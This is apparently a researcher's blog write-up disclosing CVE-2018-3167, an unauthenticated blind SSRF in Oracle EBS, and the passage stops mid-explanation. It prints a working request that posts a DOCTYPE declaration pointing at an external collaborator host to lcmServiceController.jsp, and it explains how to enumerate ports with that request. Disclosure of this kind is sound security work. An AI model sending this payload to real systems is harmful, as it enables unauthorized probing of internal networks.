Unauthenticated Blind SSRF in Oracle EBS

CVE-2018-3167

Every security consultant I know let’s out a slight sigh when given a 1 day web application assessment of a popular off the shelf product. None the less there are often vulnerabilities to be found whether that be in the clients implementation of said product or in the product itself.

The below SSRF was found on one such test it is fairly low risk, only allowing the enumeration of ports on internal/external hosts, but may be of interest to some.

The Exploit

I found this exploit when fuzzing an endpoint involved in a previous XXE exploit, something I often do as in my experience developers will often make mistakes when rushing to patch a vulnerability.

During this fuzzing process I put in a basic DOCTYPE declaration and through some “handy collaborator” shenanigans found that something was trying to resolve the DNS of the supplied URL.

The resultant request looked something like the below request (after removing redundant headers/parameters, and redacting target details).

POST /OA_HTML/lcmServiceController.jsp HTTP/1.1

Host: victim.com

Content-Length: 56 <!DOCTYPE root PUBLIC "-//B/A/EN" "http://burpcollaboratorpayload:80">

To which… my request timed out. However, I got a DNS hit in my Burp issue log indicating something was happening but it was likely a firewall was messing with the request.

After trying TCP/443 (HTTPS) and getting the same result, I enlisted the help of a colleague to listen for requests across a large range of ports on an external IP and enumerated the port number accordingly (“80” in the above request).

This resulted in three types of responses